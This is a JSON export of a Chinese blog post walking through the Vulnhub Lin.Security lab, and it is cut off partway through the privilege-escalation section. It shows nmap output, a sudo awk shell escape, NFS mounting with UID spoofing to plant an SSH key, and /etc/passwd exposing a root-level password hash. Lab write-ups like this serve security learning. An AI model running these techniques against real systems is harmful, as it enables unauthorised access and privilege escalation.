{"id":379,"date":"2024-02-25T01:52:32","date_gmt":"2024-02-24T17:52:32","guid":{"rendered":"http:\/\/162.14.82.114\/?p=379"},"modified":"2024-02-25T01:52:32","modified_gmt":"2024-02-24T17:52:32","slug":"vulnhub-lin_security","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/379\/02\/25\/2024\/","title":{"rendered":"Vulnhub&#8211;Lin_security"},"content":{"rendered":"<h1>LIN.SECURITY: 1<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151383.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151383.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224192920849\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h2>\u914d\u7f6e\u7f51\u5361<\/h2>\n<p>\u9776\u573a\u914d\u7f6e\u4e3a<code>NAT<\/code>\uff0c\u5c1d\u8bd5\u626b\u63cf\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151385.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151385.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224193122225\" style=\"zoom: 67%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151386.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151386.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224193202814\" style=\"zoom: 67%;\" \/><\/div><\/p>\n<p>\u6ca1\u626b\u51fa\u6765\uff0c\u770b\u4e00\u4e0b\u63cf\u8ff0\uff0c\u7ed9\u51fa\u4e86\u4e00\u4e2a\u4f4e\u6743\u9650\u8d26\u53f7\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151387.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151387.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224193558142\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u83b7\u53d6\u5230\u4e86IP\uff0c\u4f46\u662f\u603b\u611f\u89c9\u4e0d\u592a\u5bf9\uff0c\u5148\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151388.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151388.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224193711085\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>ping\u4e0d\u901a\uff0c\u626b\u4e5f\u626b\u4e0d\u51fa\u6765\uff0c\u5565\u60c5\u51b5\uff0c\u91cd\u65b0\u6253\u5f00\u914d\u7f6e\u7f51\u5361\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151389.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151389.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224194039610\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u79cd\u60c5\u51b5\u5f80\u5f80\u662fvmware\u7684\u7248\u672c\u592a\u9ad8\u4e86\uff0c\u5c1d\u8bd5\u517c\u5bb9\u6027\u6539\u4f4e\u4e00\u70b9\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151390.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151390.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224194148319\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u6253\u5f00\u6ca1\u6709\u9009\u9879\u7684\u8bdd\uff0c\u5148\u70b9\u51fb\uff0c\u7b49\u5230\u53f3\u8fb9\u51fa\u73b0\u76f8\u5173\u914d\u7f6e\u4e14\u5173\u673a\u7684\u65f6\u5019\uff0c\u518d\u53f3\u952e\u5de6\u8fb9\u7684\u865a\u62df\u673a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151391.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151391.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224194313319\" \/><\/div><\/p>\n<p>\u539f\u6765\u521a\u521a\u641e\u6210<code>vmware17.0<\/code>\u7684\u4e86\uff0c\u73b0\u5728\u53ef\u4ee5\u6b63\u5e38\u914d\u7f6e\u7f51\u5361\u4e86\uff0c\u8fd8\u662fNAT\uff0c\u5c1d\u8bd5\u6253\u5f00\u770b\u4e00\u4e0b\u6709\u65e0\u6211\u4eec\u9700\u8981\u7684\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151392.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151392.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224194510157\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd8\u662f\u53ea\u6709\u4e24\u4e2a\u7f51\u5361\uff0c\u9ebb\u4e86\u3002\u3002\u3002\u3002\u4e00\u76f4\u626b\u4e0d\u51fa\u6765\u3002\u3002\u3002\u53bb\u7785\u7785\u5e08\u5085\u4eec\u7684wp\u770b\u770b\u6709\u6ca1\u6709\u9047\u5230\u8fd9\u4e2a\u95ee\u9898\uff0c\u597d\u50cf\u6ca1\u6709\u3002\u3002\u3002\u3002<\/p>\n<p>\u5c1d\u8bd5<code>virtualbox<\/code>\u6253\u5f00\u770b\u4e00\u4e0b\uff1f<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151393.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151393.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224200909565\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6211\u64e6\uff0c\u723d\u554a\uff01\uff01\u626b\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151394.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151394.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224202717952\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u8fd8\u662f\u626b\u4e0d\u5230\u3002\u3002\u3002\u3002\u3002\u53ea\u80fd\u53c2\u8003<a href=\"https:\/\/blog.csdn.net\/qq_35782055\/article\/details\/129654291\">\u8fd9\u4e2a\u5e08\u5085<\/a>\u7684blog\u4e86\uff0c\u518d\u4e0d\u884c\u5c31\u7b97\u4e86\uff0c\u76f4\u63a5\u770bwp\u5b66\u4e60\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">sudo awk &#039;BEGIN {system(&quot;\/bin\/sh&quot;)}&#039;\n# &quot;\u6253\u4e0d\u51fa\u6765\uff0c\u4f7f\u7528shift+2\u53ef\u4ee5\u6253\u51fa\u6765\nsecret\nid\nvim \/etc\/default\/keyboard\n# \u5c06XKBLAYOUT\u6539\u4e3aus\nvim \/etc\/netplan\/50-cloud-init.yaml\n# \u5c06enp0s3\u6539\u4e3aens33\nsetupcon\nnetplan apply<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151395.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151395.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224210031499\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151396.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151396.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224210152476\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u5c31\u53ef\u4ee5\u626b\u5230\u4e86\uff01\uff01\uff01\uff01\u5e08\u5085\u771f\u662f\u5999\u624b\u795e\u533b\u554a\uff01\uff01\uff01<a href=\"https:\/\/blog.csdn.net\/qq_35782055\">\u4e28Arcueid\u4e28<\/a>\u5e08\u5085\u725b\u903c\uff01\uff01\uff01\uff01<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sT -T4 -sV -p- 192.168.244.129<\/code><\/pre>\n<pre><code class=\"language-text\">Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-02-24 08:09 EST\nNmap scan report for 192.168.244.129\nHost is up (0.0016s latency).\nNot shown: 65528 closed tcp ports (conn-refused)\nPORT      STATE SERVICE  VERSION\n22\/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n111\/tcp   open  rpcbind  2-4 (RPC #100000)\n2049\/tcp  open  nfs      3-4 (RPC #100003)\n40999\/tcp open  mountd   1-3 (RPC #100005)\n41445\/tcp open  nlockmgr 1-4 (RPC #100021)\n46043\/tcp open  mountd   1-3 (RPC #100005)\n57797\/tcp open  mountd   1-3 (RPC #100005)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>22\u7aef\u53e3\uff08\u5229\u7528\u4f5c\u8005\u7ed9\u7684\u7528\u6237\u767b\u5f55\uff09<\/h3>\n<p>ssh \u8fde\u63a5\u4e00\u4e0b\uff0c\u5728kali\u4e0a\u505a\uff1a<\/p>\n<pre><code class=\"language-bash\">ssh bob@192.168.244.129<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151397.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151397.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224211401425\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>40999\u300146043\u300157797\uff08\u5229\u7528\u5171\u4eab\u76ee\u5f55\u83b7\u53d6\u6743\u9650\uff09<\/h3>\n<p>\u90fd\u5728\u8fd0\u884c<code>mountd<\/code>\uff0c\u5c1d\u8bd5\u679a\u4e3e\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ showmount -e 192.168.244.129\nExport list for 192.168.244.129:\n\/home\/peter *<\/code><\/pre>\n<p>\u6ca1\u53d1\u73b0\u5565\u4e1c\u897f\u3002\u3002\u3002\u521b\u5efa\u4e00\u4e2a\u672c\u5730\u76ee\u5f55\u7528\u4ee5\u6302\u8f7d\u7f51\u7edc\u5171\u4eab\u8d44\u6e90\uff1a<\/p>\n<pre><code class=\"language-bash\">mdkir peter\nsudo mount -t nfs 192.168.244.129:\/home\/peter .\/peter -o nolock\n# \u53c2\u6570&quot;-o nolock&quot;\u8868\u793a\u5728\u6302\u8f7d\u65f6\u4e0d\u4f7f\u7528\u6587\u4ef6\u9501\u5b9a\u673a\u5236\uff0c\u8fd9\u610f\u5473\u7740\u5141\u8bb8\u591a\u4e2a\u5ba2\u6237\u7aef\u540c\u65f6\u5bf9\u6587\u4ef6\u8fdb\u884c\u8bfb\u5199\u64cd\u4f5c\uff0c\u4f46\u4e5f\u53ef\u80fd\u5bfc\u81f4\u6570\u636e\u4e00\u81f4\u6027\u95ee\u9898\u3002\ncd peter\nls -la\nmkdir .ssh\nstat peter\nsudo useradd -u 1001 hack\nsudo -u hack bash\n#hack\ncd peter\nmkdir .ssh\ncd ..\/;cp authorized_keys peter\/.ssh\/\n\n# kali\nssh-keygen -t rsa -b 2048\npwd\nsudo cp id_rsa.pub \/home\/kali\/temp\/authorized_keys<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151398.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151398.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224214458643\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">ssh -l peter 192.168.244.129<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151399.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151399.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224214725210\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<p>\u53c2\u8003<a href=\"https:\/\/gtfobins.github.io\/\">GTFOBins<\/a>\uff0c\u6709\u5f88\u591alinux\u6743\u9650\u63d0\u5347\u7684\u65b9\u6cd5\uff01\uff01\uff01\uff01<\/p>\n<h3>\/etc\/passwd(bob and peter)<\/h3>\n<p>\u76f4\u63a5\u8bfb\u53d6<code>\/etc\/passwd<\/code>\uff1a<\/p>\n<pre><code class=\"language-text\">root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd\/netif:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd\/resolve:\/usr\/sbin\/nologin\nsyslog:x:102:106::\/home\/syslog:\/usr\/sbin\/nologin\nmessagebus:x:103:107::\/nonexistent:\/usr\/sbin\/nologin                                                                           \n_apt:x:104:65534::\/nonexistent:\/usr\/sbin\/nologin                                                                               \nlxd:x:105:65534::\/var\/lib\/lxd\/:\/bin\/false\nuuidd:x:106:110::\/run\/uuidd:\/usr\/sbin\/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\nlandscape:x:108:112::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:109:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\nbob:x:1000:1004:bob:\/home\/bob:\/bin\/bash\nstatd:x:111:65534::\/var\/lib\/nfs:\/usr\/sbin\/nologin\npeter:x:1001:1005:,,,:\/home\/peter:\/bin\/bash\ninsecurity:AzER3pBZh6WZE:0:0::\/:\/bin\/sh          \u9ad8\u6743\u9650\u7528\u6237\u4e14\u6709\u5bc6\u7801hash\u503c\nsusan:x:1002:1006:,,,:\/home\/susan:\/bin\/rbash<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151400.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151400.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240224215948836\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151401.png'><img class=\"lazyload 